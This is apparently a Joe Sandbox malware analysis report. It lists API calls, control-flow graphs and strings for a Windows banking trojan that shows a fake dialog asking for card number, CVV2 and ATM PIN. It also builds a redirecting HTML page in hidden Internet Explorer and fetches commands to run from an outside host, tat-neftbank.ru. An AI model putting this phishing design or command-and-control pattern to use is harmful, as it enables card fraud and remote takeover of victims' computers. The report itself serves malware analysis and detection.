                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 399 406941-406970 sscanf 397->399 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 399->402 403 40699b-4069a2 399->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
